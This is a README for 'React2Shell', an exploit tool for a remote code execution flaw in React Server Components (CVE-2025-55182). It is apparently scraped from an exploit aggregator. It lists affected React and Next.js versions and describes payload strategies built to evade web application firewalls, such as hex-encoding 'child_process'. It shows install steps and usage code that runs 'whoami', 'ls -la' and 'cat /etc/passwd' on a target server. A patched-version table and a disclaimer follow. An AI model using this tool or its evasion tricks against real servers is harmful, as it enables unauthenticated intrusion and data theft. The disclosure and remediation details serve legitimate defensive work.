## https://sploitus.com/exploit?id=37FAA55E-B00D-55EC-8CDB-C813E615F63E
# React2Shell





**React2Shell** is a proof-of-concept (`PoC`) exploit demonstrating a `CRITICAL` remote code execution (`RCE`) vulnerability in modern web frameworks using **React Server Components** (`RSC`).
This PoC targets **`CVE-2025-55182`**, a `CVSS 10.0` vulnerability that allows **unauthenticated remote attackers** to execute arbitrary system commands via insecure deserialization inside the React Server Components implementation.
---
## ๐ Vulnerability Overview
**React2Shell** exploits a flaw in how React Server Components process untrusted input during the **rehydration** phase.
| Metric | Details |
| :------------------- | :---------------------------------------------------------------------- |
| **Severity** | `CRITICAL (10.0 / 10.0)` |
| **Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` |
| **Attack Vector** | `Network (Remote)` |
| **User Interaction** | `None` |
The vulnerability originates in the underlying `react-server-dom-*` packages responsible for serializing and deserializing component trees.
---
## ๐ฅ Impact
Applications using affected versions of React Server Components may process malicious payloads in a way that leads to **remote code execution (`RCE`)** under the privileges of the server process.
An attacker can:
- Execute arbitrary system commands.
- Pivot into internal infrastructure.
- Exfiltrate sensitive data.
- Disrupt service availability.
If your deployment matches any of the vulnerable versions below and exposes RSC endpoints, you are **`vulnerable`**.
---
## ๐ฆ Affected Components
The vulnerability is present in versions `19.0.0`, `19.1.0`, `19.1.1`, and `19.2.0` of:
- `react-server-dom-parcel`
- `react-server-dom-webpack`
- `react-server-dom-turbopack`
---
## ๐ฏ Affected Frameworks & Versions
These packages are bundled into multiple frameworks, including but not limited to:
- **Next.js**
- Versions `15.0.0` through `16.0.6`
- Canary versions after `14.3.0-canary.76`
- **Other frameworks** using `RSC` (`v19.0.0โ19.2.0`), such as:
- `Vite`
- `Parcel`
- `React Router`
- `RedwoodSDK`
- `Waku`
Any framework embedding the vulnerable React Server Components implementation is potentially affected.
---
## ๐ Features & Capabilities
React2Shell includes a modular payload generator designed to bypass common Node.js restrictions and WAF rules:
- **Standard Injection**
- Uses `process.mainModule.require`
- Targets default `Next.js` / Webpack bundles.
- **Async Bypass**
- Uses dynamic `import()` for strict ESM environments where `require` is unavailable.
- **Obfuscation**
- Encodes sensitive strings (for example, `child_process`) into hex buffers to evade naive WAF signatures.
- **Module Fallback**
- Leverages `module.createRequire` to load modules in alternative contexts.
- **Universal Targeting**
- Configurable endpoints:
- Next.js: root `/`
- Waku: RSC endpoints such as `/RSC/foo.txt`
---
## ๐ Installation
### Prerequisites
- `Node.js` **v18.0.0** or higher.
### Setup
```bash
git clone https://github.com/rsch-io/CVE-2025-55182-React2Shell.git
cd CVE-2025-55182-React2Shell
npm install form-data
```
---
## ๐ Usage
React2Shell is intended to be imported as a module into your own testing scripts.
### 1. Basic Exploit (Next.js Target)
Create a file named `exploit.js`:
```javascript
const React2Shell = require('./src/react2shell');
// Initialize with target base URL
const target = new React2Shell('http://localhost:3000');
// Execute command using the "standard" strategy
// Arguments: execute(command, endpoint, strategy)
target.execute('whoami', '/', 'standard');
```
Then run:
```bash
node exploit.js
```
> **Note**
> - `endpoint` should be set to an RSC-enabled route (for example, `/`, `/RSC/foo.txt`, or framework-specific RSC endpoints).
> - `strategy` can be changed (for example, `standard`, `async`, `obfuscated`, or any other strategy implemented in `react2shell`).
---
### 2. Targeting Waku / Custom Endpoints
Waku and other frameworks often expose RSC handling on specific routes:
```javascript
// Target a Waku application
// Note: Use 'async' strategy as Waku often runs in strict ESM
target.execute('ls -la', '/RSC/foo.txt', 'async');
```
---
### 3. WAF Evasion Mode
If the server blocks strings containing `child_process`, you can use the `obfuscated` strategy:
```javascript
target.execute('cat /etc/passwd', '/', 'obfuscated');
```
---
## ๐ก๏ธ Resolution & Remediation
`Update immediately.` Updated releases of React and affected downstream frameworks include hardened handling of user inputs to prevent unintended behavior.
All users should upgrade to a **patched** version as soon as possible.
### โ Fixed Versions List
Below is the definitive list of patched versions. If your deployed version is lower than these, you are **`vulnerable`**.
| Software / Package | Branch / Type | ๐ก๏ธ Fixed / Safe Version(s) |
| ------------------ | ------------ | -------------------------------------------------------- |
| `React` | Stable | `19.0.1`, `19.1.2`, `19.2.1` |
| `Next.js` | v15 (Stable) | `15.0.5`, `15.1.9`, `15.2.6`, `15.3.6`, `15.4.8`, `15.5.7` |
| `Next.js` | v16 (Stable) | `16.0.7` |
| `Next.js` | Canary | `15.6.0-canary.58` |
> **Warning for Next.js 14 users**
> If you are using `Next.js 14.3.0-canary.77` or a later canary release, you are **`vulnerable`**.
> You must downgrade to the latest stable `14.x` release immediately, as the vulnerability affects the experimental RSC implementation present in those canary builds.
---
## โ ๏ธ Disclaimer
This project is provided **for `educational` and authorized security testing purposes only**.
Using this tool against systems **without explicit permission** is illegal and unethical.
The author(s) assume **no liability** for any misuse or damage caused by this tool.
---
## ๐ License
This project is licensed under the **MIT License**. See the `LICENSE` file for details.